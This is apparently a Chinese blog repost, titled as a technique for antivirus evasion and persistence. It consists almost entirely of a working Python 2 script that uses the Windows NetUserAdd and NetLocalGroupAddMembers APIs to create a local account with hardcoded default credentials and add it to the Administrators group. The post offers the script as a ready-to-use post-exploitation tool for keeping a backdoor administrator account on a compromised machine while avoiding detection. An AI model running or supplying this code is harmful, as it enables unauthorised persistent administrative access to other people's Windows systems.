免杀/权限维持------API添加用户

原文      

https://mp.weixin.qq.com/s/5Iitrfst3TXd8sRCfq6sHw

python2,默认添加Test1234,密码Test@1234,组Administrators。

import ctypes
from ctypes import wintypes
from ctypes import *
import sys

USER_PRIV_GUEST = 0
USER_PRIV_USER = 1
USER_PRIV_ADMIN = 2
UF_SCRIPT = 1
UF_NORMAL_ACCOUNT = 512

LPBYTE = POINTER(c_byte)

class USER_INFO_1(ctypes.Structure):
    _fields_ = [
        ('usri1_name',wintypes.LPWSTR),
        ('usri1_password',wintypes.LPWSTR),
        ('usri1_password_age',wintypes.DWORD),
        ('usri1_priv',wintypes.DWORD),
        ('usri1_home_dir',wintypes.LPWSTR),
        ('usri1_comment',wintypes.LPWSTR),
        ('usri1_flags',wintypes.DWORD),
        ('usri1_script_path',wintypes.LPWSTR)
    ]

class _LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
    _fields_ = [
        ('lgrmi3_domainandname', wintypes.LPWSTR)
    ]

def adduser(username = 'Test1234',password = 'Test@1234'):
    ui = USER_INFO_1()
    ui.usri1_name =username
    ui.usri1_password =password
    ui.usri1_priv = USER_PRIV_USER
    ui.usri1_home_dir = None
    ui.usri1_comment = None
    ui.usri1_flags = UF_SCRIPT
    ui.usri1_script_path = None

    a = ctypes.windll.Netapi32.NetUserAdd(None,1,ui,None)
    if a == 0:
        print("add user success : name={} passwd={}".format(username,password))
    else:
        print("add user error")

def addgroup(username ='Test1234' ,groupname = 'Administrators'):
    name = _LOCALGROUP_MEMBERS_INFO_3()
    name.lgrmi3_domainandname = username

    ctypes.windll.Netapi32.NetLocalGroupAddMembers.argtypes = (wintypes.LPCWSTR,wintypes.LPCWSTR,wintypes.DWORD,LPBYTE,wintypes.DWORD)
    b = ctypes.windll.Netapi32.NetLocalGroupAddMembers(None, groupname, 3, LPBYTE(name), 1)
    if b == 0:
        print("add group success : name={} group={}".format(username, groupname))
    else:
        print("add group error")

def main():
    if len(sys.argv) == 1:
        adduser()
        addgroup()
    elif len(sys.argv) == 3:
        adduser(str(sys.argv[1]),str(sys.argv[2]))
        addgroup(str(sys.argv[1]))
    elif len(sys.argv) == 4:
        adduser(str(sys.argv[1]), str(sys.argv[2]))
        addgroup(str(sys.argv[1]),str(sys.argv[3]))
    else:
        print("usage: {} username password".format(sys.argv[1]))
        print("usage: {} username password groupname".format(sys.argv[1]))

if __name__ == '__main__':
    main()

 

posted @ 2021-07-18 22:27  Shadown-PQ  阅读(300)  评论(0)    收藏  举报